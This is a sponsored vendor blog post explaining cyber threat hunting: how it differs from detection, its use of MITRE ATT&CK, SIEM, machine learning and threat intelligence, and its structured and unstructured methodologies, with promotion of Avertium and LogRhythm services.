Editor’s Note: This a partnered sponsored guest blog written by Avertium.
What is threat hunting?
Cyber threat hunting is a proactive cybersecurity strategy that searches through networks to detect and isolate advanced threats before they present themselves. Threat hunters do not simply search for active threats. They are in search of hacker tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), indicators of attack (IOAs), and threats such as advanced persistent threats (APTs) evading your existing security system. Although threat hunters have a variety of strategies at their disposal, the best strategy is often determined by the type of threat they are hunting.
Threat hunting vs. threat detection
At its core, threat hunting is more than just detection and response. While threat detection focuses on identifying evidence of an attack such as correlated events or signature-based detection, threat hunting takes a more proactive approach to cybersecurity. Threat hunting is intended to counteract an adversary that is in the organization’s environment but has not yet shown any indicators of compromise.
Threat detection relies on indicators of compromise because:
- IOCs are predictable
- IOCs are logical and quantifiable
- IOCs are static and NOT permutable
- IOCs are visible and discoverable
In comparison, threat hunting uses threat indicators as a starting point or hypothesis for a quest. Virtual fingerprints left by malware or an attacker, a weird IP address, phishing emails, or other unexpected network traffic are all threat signs. In other words, threat hunting does not wait for IOCs to appear before seeking out security breaches.
Threat hunting is more focused on indicators of attack (IOA):
- IOAs focus on detecting intent
- IOAs are patterns of behavior that often precede an attack
Both threat detection and threat hunting are complementary approaches to identifying and responding to security threats. They are most effective when used in tandem. While threat detection provides vital defensive measures, threat hunting is the offensive playbook for outmaneuvering an enemy before they have the chance to act.
In a non-security setting, think about the following application. An effective criminal does research before staging a robbery. A bank that relies solely on threat detection is only alerted once IOCs are flagged when the criminal has already accessed the vault. A bank that also threat hunts would be continuously on alert for IOAs that would allow their security team to respond to suspicious activity before any plan is executed. A plotting bank robber would likely investigate security systems, walk around the premises, and note the layout of the bank and the location of the vault prior to returning to perform a heist. None of these IOAs may individually signal an imminent threat, but they give reason to monitor the individual when viewed together in context.
Technology, methodologies, and frameworks for threat hunting
Effective threat hunters hypothesize the most likely tactics and attack chains by thinking like their enemies. That said, there is no one-size-fits-all tactical approach to threat hunting. Instead, effective threat hunters rely on an arsenal of effective tools, frameworks, and methodologies for hunting threats.
Threat hunting technology and tips
1. Using SIEM technology alongside MITRE ATT&CK
How do you stop a threat when you are not sure it even exists? You hunt for it. To be a successful threat hunter, you need to stay one step ahead of your adversaries. Then understand their perspective, form a hypothesis about the existence of a threat, theorize how to detect it, and then stop it. The MITRE ATT&CK framework is a great starting point for understanding attackers. It provides a catalog of real-world adversarial tactics and techniques.
Using the MITRE ATT&CK framework to inform your SIEM configuration, you can streamline threat hunting via:
- An end-to-end threat hunting workflow that enables you to rapidly spot leading and active indicators of attack.
- Custom and pre-built dashboards that visualize data to identify known adversarial techniques and tactics.
- Out-of-the-box content that saves you precious time and streamlines work into a single user interface.
2. Machine learning/artificial intelligence
The complexity and volume of cyber threats are evolving at a dangerously rapid pace. With the shortage of qualified analysts, inefficient manual processes, and the growing cost of securing a business, organizations of all sizes are exposed to countless risks.
Avertium’s Cyber Fusion Centers (CFCs) leverage artificial intelligence (AI) and machine learning (ML) and LogRhythm’s SOC analysts uses ML to stay ahead. The solution is to incorporate security technology that can automate tasks associated with threat detection, incident response, and administration with AI.
LogRhythm UEBA provides unparalleled accuracy by using ML to detect potential hidden threats and evolves in your environment. It combines supervised and unsupervised learning for continuous, automated tuning without requiring manual intervention. As a result, your security grows smarter over time.
3. Threat intelligence
Cyber threat intelligence (CTI) is a body of information regarding attempted or successful breaches that are gathered and evaluated by automated security systems that use machine learning and artificial intelligence. When used to your advantage, threat intelligence can help you hunt down your threats, shifting your security from a state of reactivity to prevention.
Basically, threat hunting begins where threat intelligence ends. Therefore, CTI plays an essential role in keeping your OpSec staff up-to-date on active threat actors and the latest TTPs likely to be used against your company.
A proper threat hunt takes advantage of CTI to conduct a comprehensive, system-wide search for threat actors
Ariel Ropek, Avertium’s Director of Cyber Threat Intelligence, provides an example of a concrete case where the value of threat intelligence might look like this:
“The Conti and Ryuk ransomware kill chains both begin with TrickBot malware as the initial infection. Conti progresses to the PowerShell Empire toolset for persistence and command and control (C2), while Ryuk typically uses Cobalt Strike for C2 operations. If a threat hunter observed IOCs related to TrickBot malware in an environment, they could use this intelligence to expand their hunt to both PS Empire and Cobalt Strike IOCs. The result of those searches would indicate whether Conti or Ryuk was the likely adversary and inform incident response teams of appropriate next steps.”
Intelligence-driven threat hunting links malicious activity to known entities and gives threat hunters additional context about how far the kill chain has progressed as well as what the adversary is likely to do next.
Managed detection and response (MDR) is an outsourced managed security service that provides organizations with threat hunting services and responds to threats once they are discovered. It is yet another tool in the toolbox but is not all-inclusive.
Endpoint detection and response (EDR) is an automated and continuous system of monitoring user data for suspicious activity. It alerts security teams of anomalous user behavior to help identify and contain threats to their endpoint.
Additional tools that could be used within your threat hunting program
- YARA is a program that aids malware researchers in identifying and classifying malware samples, among other things. You may use YARA to construct descriptions of malware families (or anything else) based on textual or binary patterns. Each rule, or description, is made up of a set of strings and a boolean expression that determines the logic of the rule. It is utilized by a who’s who list of cybersecurity companies in our industry.
- DNSTWIST is a domain name permutation engine for detecting homograph phishing attacks, typosquatting, and brand impersonation. It can find lookalike domains that adversaries can use to attack your business.
- Phishing Catcher identifies possible phishing domains in near real-time. It scans the CertStream API for suspicious TLS certificate issuances that have been reported to the Certificate Transparency Log (CTL).
Threat Hunting Methodologies
Threat hunting methodologies are separated into two types. Depending on the approach, they are either structured or unstructured hunting.
Structured threat hunting is based on indicators of attack and TTPs of an attacker. It leverages MITRE Adversary Tactics Techniques and Procedures and Common Knowledge (ATT&CK) framework using both PRE-ATT&CK and enterprise frameworks.
Unstructured hunting is based on a trigger. It uses available data to follow the path of any detected IOC.
Types of structured threat hunts:
- Hypothesis-based hunting leverages global detection frameworks to understand the TTPs of attackers and IOAs. By applying known frameworks of predictable attacker behavior to one’s own environment, it can stop attackers before they ever manage to attack the environment. There are three generally recognized hypothesis-based types: awareness, intelligence, and analytics.
- Awareness: identifying the most critical hazards to target throughout the hunt using situational awareness and current environmental knowledge.
- Intelligence: based on typical threat actor TTPs, an intelligence-driven hypothesis is developed. The hunters test this hypothesis by observing and inspecting the network and systems to see whether certain TTP behaviors are present in the environment. IOCs or IOAs can also be used to support intelligence-based hypotheses.
- Analytics: based on the utilization of current structured frameworks and models, as well as information produced from machine learning and artificial intelligence, an analytics-driven hypothesis is developed.
Types of unstructured threat hunts:
- Data-driven hunting is a hunter who is just going through accessible data looking for abnormalities that might uncover questionable activity. This sort of danger hunting is unstructured since it does not begin with a hypothesis and does not follow a preset path.
- Intelligence-based hunting or intel-based hunting is driven by threat intelligence to search for attack patterns related to specific threat actors, malware variants, or campaigns. Analysts have developed detailed profiles of threat actors which inform hunters of which course of action, or kill chain, an adversary is likely to take. These threat actor kill chains are closely aligned with the MITRE ATT&CK framework and define specific TTPs that an attacker would likely use at each stage of the attack. For example, if a hunter detected an IOC related to reconnaissance by a known threat actor group, threat intelligence could tell the threat hunter what attack patterns to anticipate.
Putting the context of threat hunting into action
The tactics, techniques, and procedures of bad actors are always evolving. Adaptive enemies call for adaptive security. A holistic, risk-based approach to cybersecurity layers services, technology capabilities, and tried-and-true security frameworks like MITRE ATT&CK with strategy and client collaboration to deliver a more resilient security posture. See the resources for additional help with your threat hunting planning.
Read more on threat hunting resources
- Understanding Cybersecurity Best Practice
- The MITRE ATT&CK framework
- A contribution from LogRhythm’s perspective on Threat Hunting
- A contribution from LogRhythm’s perspective on the LogRhythm UEBA
- How WhisperGate Affects the US and Ukraine
- MDR: Managed detection and response (MDR)
- EDR: Endpoint detection and response (EDR)
- Using MITRE ATT&CK Framework for Beyond-Checkbox Cybersecurity
- MITRE Adversary Tactics Techniques and Procedures and Common Knowledge (ATT&CK)